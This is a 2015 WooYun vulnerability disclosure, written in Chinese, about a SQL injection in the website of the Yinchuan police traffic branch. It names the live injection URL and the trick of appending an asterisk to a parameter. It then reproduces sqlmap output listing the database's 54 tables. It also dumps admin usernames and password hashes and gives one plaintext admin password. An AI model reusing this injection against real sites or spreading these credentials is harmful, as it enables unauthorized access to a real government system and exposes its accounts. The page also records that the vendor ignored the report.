当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138826

漏洞标题:银川市公安局交通警察分局伪静态注入一枚

相关厂商:银川市公安局

漏洞作者: 尊-折戟

提交时间:2015-09-03 18:16

修复时间:2015-09-08 18:18

公开时间:2015-09-08 18:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-03: 细节已通知厂商并且等待厂商处理中
2015-09-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT!

详细说明:

注入点:

http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21


NXV%%2HAY@U5$91E@XMWV0O.jpg


TZ{4$}L3_$$FVZ`W6)%N(SK.jpg


加个*号即可报错。代入语句

http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21*


35KKM(GQ$4}S}H6GGV39F{H.png


数据库和管理员权限:

B$ODDVAW@~GOZ@X2K0}0H}M.png


8I}7YY_VKESEPXSXXZ[W674.png


current database:    'ycpolice'


[15:24:29] [INFO] resumed: yin_yanhuo
Database: ycpolice
[54 tables]
+------------------+
| yin_about |
| yin_actions |
| yin_address |
| yin_admin |
| yin_ajcheck |
| yin_baopozy |
| yin_bendisfz |
| yin_cardopen |
| yin_chenshibp |
| yin_chujinsi |
| yin_company |
| yin_complain |
| yin_config |
| yin_constable |
| yin_customer |
| yin_daxinhd |
| yin_department |
| yin_fenip |
| yin_findman |
| yin_gangaodj |
| yin_gknews |
| yin_gknewsclass |
| yin_guideclass |
| yin_jsxinxi |
| yin_jubao |
| yin_liuyan |
| yin_maps |
| yin_member |
| yin_message |
| yin_mycar |
| yin_news |
| yin_node |
| yin_photos |
| yin_pthuzhao |
| yin_reconsider |
| yin_renzhengma |
| yin_role |
| yin_showask |
| yin_suggestion |
| yin_user |
| yin_userguide |
| yin_waidisfz |
| yin_wanglaitw |
| yin_xinserver10 |
| yin_xinserver102 |
| yin_xinserver12 |
| yin_xinserver13 |
| yin_xinserver5 |
| yin_xinserver6 |
| yin_xinserver81 |
| yin_xinserver82 |
| yin_xinserver9 |
| yin_xinzhenfy |
| yin_yanhuo |
+------------------+


延时注入很慢。。。。。就跑了主要的!

JX4$1X)M0JRVH]LNJ057]89.png


得到管理员用户和密码。跑完这里花了差不多2个小时,还有好多,不跑了,

Database: ycpolice
Table: yin_admin
+---------------+-----------------------------------+
| AdminName | AdminPass |
+---------------+-----------------------------------+
| admin | ee702fe1e29a440eff95fbb8f5401b8a |
| anfang | d123a7a95ba0bcec6e6be6ba4e1c3f01 |
| baixiaofeng | c8837b23ff8aaa8a2dde915473ce0991 |
| beijie | 324d1907d9ca6733d399b87affe48c74 |
| bgs001 | 189103a260b8899ab8d3f524f484369b |
| bjs | d41d8cd98f00b204e9800998ecf8427e |
| bjx001 | f5ee68970ae263e56816d4051807ae52 |
| bjzl001 | c8837b23ff8aaa8a2dde915473ce099 |
| BTG | db412c68a444b151308264631876567 |
+---------------+-----------------------------------+


跑的太慢了,就列了前面几个,其中有admin/dc6915681
就这样吧。。

漏洞证明:

数据库和管理员权限:

B$ODDVAW@~GOZ@X2K0}0H}M.png


8I}7YY_VKESEPXSXXZ[W674.png


JX4$1X)M0JRVH]LNJ057]89.png

修复方案:

特殊字符过滤!

版权声明:转载请注明来源 尊-折戟@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-08 18:18

厂商回复:

最新状态:

暂无